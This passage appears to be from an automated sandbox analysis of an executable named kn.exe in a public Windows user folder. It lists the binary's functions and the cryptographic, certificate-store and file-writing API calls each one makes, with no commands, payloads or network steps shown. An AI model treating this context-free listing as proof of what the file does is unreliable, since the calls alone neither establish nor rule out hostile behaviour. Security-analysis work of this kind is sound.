    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACDC940
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68AC5C960
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68ACC8AFC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC72B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF68AC72B00
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF68ACD0ABC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF68ACD2AE4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD02A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF68AD02A78
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC46A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF68AC46A84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68ACBEA7C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD8AA0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0700C BCryptEnumAlgorithms,#360,7_2_00007FF68AD0700C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68AC4302F
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC47034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF68AC47034
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF68ACC9028
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD7020
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD301C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC64F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF68AC64F90
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF68ACD0FB4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF68AD06FAC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68ACB4F50
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACFEF74
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF68ACC0F58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC89134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF68AC89134
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07124 BCryptGenerateKeyPair,#360,7_2_00007FF68AD07124
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF68ACF511C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD070C8 BCryptSetProperty,#360,7_2_00007FF68AD070C8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD10D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF68ACD10D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68ACD30D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF68AC7107C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACDB0A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF68AC9B098
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0705C BCryptGetProperty,#360,7_2_00007FF68AD0705C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD1058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF68ACD1058
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC60E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC60E24
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF68ACD0DD4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF68ACF8DD0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD20DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF68AD20DB8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06DE0 NCryptCreatePersistedKey,#360,7_2_00007FF68AD06DE0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF68ACB4DDC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0D84 NCryptFreeObject,#205,#357,7_2_00007FF68ACD0D84
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06D78 NCryptOpenKey,#360,7_2_00007FF68AD06D78
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68ACD2D78
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD02DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF68AD02DAC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06F2C NCryptExportKey,#360,7_2_00007FF68AD06F2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC68F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF68AC68F1C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF68ACD0EF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD30ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF68AD30ED0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFEE94 CryptSignMessage,SetLastError,7_2_00007FF68ACFEE94
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC70E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF68AC70E94
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68ACA2E7C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06EA8 NCryptImportKey,#360,7_2_00007FF68AD06EA8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD14E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF68AD14E58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06E48 NCryptSetProperty,#360,7_2_00007FF68AD06E48
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF68ACD2E6C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC54410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC54410
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD08404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68AD08404
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC723E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF68AC723E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF68AC5E3B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF68ACC6374
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF68ACC2358
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF68AC5C514
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68ACFE516
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF68ACA24D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC444E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC444E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACC8488
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF68ACAA450
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF68ACAC450
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68ACCE1F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF68AD0A1F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD36214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF68AD36214
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF68ACBA1E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68ACB6194
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68AC9417C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF68ACF61AC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC721A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF68AC721A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3613C CryptDecodeObjectEx,7_2_00007FF68AD3613C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC70300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF68AC70300
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF68AD3A2E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD08298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF68AD08298
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACA6280
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68ACF2278
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68ACFE274
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC56824 CryptHashCertificate,GetLastError,#357,7_2_00007FF68AC56824
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD08814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF68AD08814
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC367CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC367CC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68ACE07D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACC27BC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68ACBC7F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD07F4 BCryptDestroyKey,#205,#357,7_2_00007FF68ACD07F4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD07A4 BCryptDestroyHash,#205,#357,7_2_00007FF68ACD07A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF68ACD0740
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68AD0A740
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD04914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68AD04914
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF68ACBE914
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF68AC4A8CC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD08EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF68ACD08EC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68AD3E8B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF68ACD0844
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC58600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF68AC58600
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC60630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC60630
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68AC5C5D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF68AC925E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF68ACCE57C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD65B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF68ACD65B4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF68AD3A58C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68AD0A590
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC2724 CryptDecodeObject,GetLastError,#357,7_2_00007FF68ACC2724
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC726E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF68AC726E0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD066D8 NCryptFreeObject,#360,7_2_00007FF68AD066D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF68ACF86D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF68ACA4694
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC66694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF68AC66694
